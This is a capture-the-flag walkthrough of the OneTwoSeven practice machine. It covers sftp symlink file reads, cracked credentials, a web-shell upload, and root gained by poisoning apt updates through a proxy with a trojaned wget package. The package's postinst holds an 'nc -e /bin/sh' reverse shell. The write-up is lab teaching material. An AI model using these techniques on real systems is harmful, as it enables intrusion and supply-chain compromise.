From nmap port 22 and 80 are open.
root@kali:# nmap -sC -sV 10.10.10.133
# Nmap 7.60 scan initiated Thu May 9 18:38:49 2019 as: nmap -sC -sV -oA ots 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.090s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
| 256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_ 256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (EdDSA)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to signup.php we get sftp credentials
Username: ots-2MTQ2M2I
Password: b761463b
and a personal homepage located at http://onetwoseven.htb/~ots-2MTQ2M2I/
From help command symlink command is available.
Using symlink /var/www/html/index.php index.php we can read the source code of the index page.
<?php if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" || $_SERVER['REMOTE_ADDR'] == "104.24.0.54" ) { ?>
<li class="nav-item"><a id="adminlink" class="nav-link enabled" href="http://onetwoseven.htb:60080/">Admin</a></li>
<?php } else { ?>
<li class="nav-item"><a id="adminlink" class="nav-link disabled" href="http://onetwoseven.htb:60080/">Admin</a></li>
<?php } ?>
By Requesting the website from localhost we can access port 60080 which will reveal the admin page.
The following command can make our requests on 127.0.0.1:60080 go to the onetwoseven box 127.0.0.1:60080 address.
ssh -N -f ots-2MTQ2M2I@onetwoseven.htb -L 127.0.0.1:60080:127.0.0.1:60080
From manpages
- -N Do not execute a remote command. This is useful for just forwarding ports.
- -f The -f option backgrounds ssh and the remote command “sleep 10” is specified to allow an amount of time (10 seconds, in the example) to start the service which is to be tunnelled.
Login to sftp as ots-2MTQ2M2I and Password b761463b
and
symlink ../../../../../../../../../var/html/ to index.html lists the files on the directory. Download the login.php.swp file and use strings against it.
Username is ots-admin[plaintext]
Password: 11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8:Homesweethome1 [sha256] cracked by hashes.org
Ge the credentials from Default Page and use them on sftp.
Using the [DL] button we can download the source code of the php files.
From ots-sysupdate.php
switch (true) {
# Upload addon to addons folder.
case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
if(isset($_FILES['addon'])){
$errors= array();
$file_name = basename($_FILES['addon']['name']);
$file_size =$_FILES['addon']['size'];
$file_tmp =$_FILES['addon']['tmp_name'];
if($file_size > 20000){
$errors[]='Module too big for addon manager. Please upload manually.';
}
if(empty($errors)==true) {
move_uploaded_file($file_tmp,$file_name);
header("Location: /menu.php");
header("Content-Type: text/plain");
echo "File uploaded successfull.y";
} else {
header("Location: /menu.php");
header("Content-Type: text/plain");
echo "Error uploading the file: ";
print_r($errors);
}
}
break;
and
RewriteEngine On
RewriteRule ^addon-upload.php addons/ots-man-addon.php [L]
RewriteRule ^addon-download.php addons/ots-man-addon.php [L]
Are preventing us from uploading a plugin.
This can be bypassed by changing the uri.
Using the plugin upload we upload a shell
The uploaded file is located on /addons.
From linenum.sh script
We can sudo without supplying a password!
Matching Defaults entries for www-admin-data on onetwoseven:
env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy", mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-admin-data may run the following commands on onetwoseven:
(ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
By setting http_proxy= to our web server ip address we can direct all http requests to that server, thus we can check the webserver log files and see what sudo /usr/bin/apt-get update does.
Edit the hosts file and add
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.133 onetwoseven.htb packages.onetwoseven.htb
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
The command sudo /usr/bin/apt-get update downloads some file which contain info about package updates.
Two requests are important here
10.10.10.133 - - [03/Jun/2019:08:26:04 +0300] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages.xz HTTP/1.1" 404 497 "-" "Debian APT-HTTP/1.3 (1.4.9)"
Apt here gets the Packages.xz file.
10.10.10.133 - - [03/Jun/2019:08:26:05 +0300] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages.gz HTTP/1.1" 404 497 "-" "Debian APT-HTTP/1.3 (1.4.9)"
Apt here gets the Packages.gz file.
These archives Packages.xz & Packages.gz when unpacked contain a file in which there are hashes about the packages which may be updated or the one already there.
The command sudo /usr/bin/apt-get upgrade checks the hashes and download the neded packages.
Our goal is to download a new version of wget, edit it by adding malicious code and, change the hashes inside on Packages.xz and Packages.gz. Our wget package will be located at:
/var/www/html/devuan/pool/DEBIAN-SECURITY/updates/main/w/wget/wget_1.18-5+deb9u3_amd64.deb along with some other packages required for the upgrade to happen.
[X] Get wget http://ftp.br.debian.org/debian/pool/main/w/wget/wget_1.20.1-1.1_amd64.deb
[X] Make a temporary directory mkdir tmp
[X] Unpack the .deb package dpkg-deb -R wget_1.20.1-1.1_amd64.deb tmp/
[X] Go to tmp/DEBIAN/ and create a file named postinst give execute permissions touch postinst && chmod 0775 postinst
[X] Edit the shell and add a malicious command
#!/bin/bash
nc -e /bin/sh $IP $PORT
[X] Pack the .deb package again dpkg-deb -b tmp wget_1.20.1-1.1_amd64.deb
[X] Get md5, sha1, sha256 and filesize hashes of tmp wget_1.20.1-1.1_amd64.deb.
root@kali:~/Downloads# md5sum wget_1.20.1-1.1_amd64.deb && sha1sum wget_1.20.1-1.1_amd64.deb && sha256sum wget_1.20.1-1.1_amd64.deb && ls -la wget_1.20.1-1.1_amd64.deb
083423d1b19674e3ef9c4b115d067b41 wget_1.20.1-1.1_amd64.deb
e3fa1a8902bbadfe3780f6e00be0d6cad0795fc8 wget_1.20.1-1.1_amd64.deb
68976b41f91afec38499c6d7015c73afc15a9622b2417cd6cdd73dc90f38a4b7 wget_1.20.1-1.1_amd64.deb
-rw-rw-r-- 1 fuxsocy fuxsocy 902452 Jun 6 00:06 wget_1.20.1-1.1_amd64.deb
[X] Get Packages.gz and Packages.xz wget http://deb.devuan.org/merged/dists/ascii-security/main/binary-amd64/Packages.gz && wget http://deb.devuan.org/merged/dists/ascii-security/main/binary-amd64/binary-amd64/Packages.xz
[X] Unzip Packages.gz and edit inside the packages file find wget and change the hashes and filesize.
[X] Zip Packages.gz again with the new packages file inside
[X] I am going to do the same for Packages.xz
I need to create this directories in order for the sudo /usr/bin/apt-get upgrade command to work.
├── dists
│ └── ascii
│ └── main
│ └── binary-amd64
└── pool
└── DEBIAN-SECURITY
└── updates
└── main
├── a
│ └── apache2
├── b
│ └── bind9
├── libp
│ └── libpng1.6
├── libs
│ └── libssh2
├── palio
├── s
│ └── systemd
└── w
└── wget
I created a script for that in bash.
#!/bin/bash
if [[ $EUID -ne 0 ]]; then
echo "[i]This script must be run as root"
exit 1
fi
basedir="/var/www/html/devuan"
mkdir /var/www/html/devuan
cd /var/www/html/devuan/
echo "[+]Creating directories..."\n
mkdir -p dists/ascii/main/binary-amd64
mkdir -p pool/DEBIAN-SECURITY/updates/main/a/apache2
mkdir -p pool/DEBIAN-SECURITY/updates/main/b/bind9
mkdir -p pool/DEBIAN-SECURITY/updates/main/libp/libpng1.6
mkdir -p pool/DEBIAN-SECURITY/updates/main/libs/libssh2
mkdir -p pool/DEBIAN-SECURITY/updates/main/s/systemd
mkdir -p pool/DEBIAN-SECURITY/updates/main/w/wget
echo "[+]Downloading Packages..."\n
#Wget
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2_2.4.25-3+deb9u7_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2-bin_2.4.25-3+deb9u7_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2-data_2.4.25-3+deb9u7_all.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2-utils_2.4.25-3+deb9u7_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/
#Bind9
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/bind9-host_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libbind9-140_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libdns162_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libdns-export162_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisc160_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisccc140_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisccfg140_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisc-export160_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/liblwres141_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/
#libp
wget -q http://ftp.br.debian.org/debian/pool/main/libp/libpng1.6/libpng16-16_1.6.28-1+deb9u1_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/libp/libpng1.6/
#libs
wget -q http://ftp.br.debian.org/debian/pool/main/libs/libssh2/libssh2-1_1.7.0-1+deb9u1_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/libs/libssh2/
#systemd
wget -q http://ftp.br.debian.org/debian/pool/main/s/systemd/libsystemd0_232-25+deb9u11_amd64.deb -P $basedir/pool/DEBIAN-SECURITY/updates/main/s/systemd/
Inside
/var/www/html/devuan/dists/ascii/main/binary-amd64
I have 3 files 2 of which are the Packages.gz and Packages.xz I edited before.
And Inside /var/www/html/devuan/pool/DEBIAN-SECURITY/updates/main/w/wget I have the malicious wget file I edited before.
All I need to do now is start my web server which in my case is apache2, add inside /etc/hosts de.deb.devuan.org to resolve on 10.10.10.133, and then listen with nc on the port we added on postinst file and then run sudo /usr/bin/apt-get upgrade to get shell as superuser!
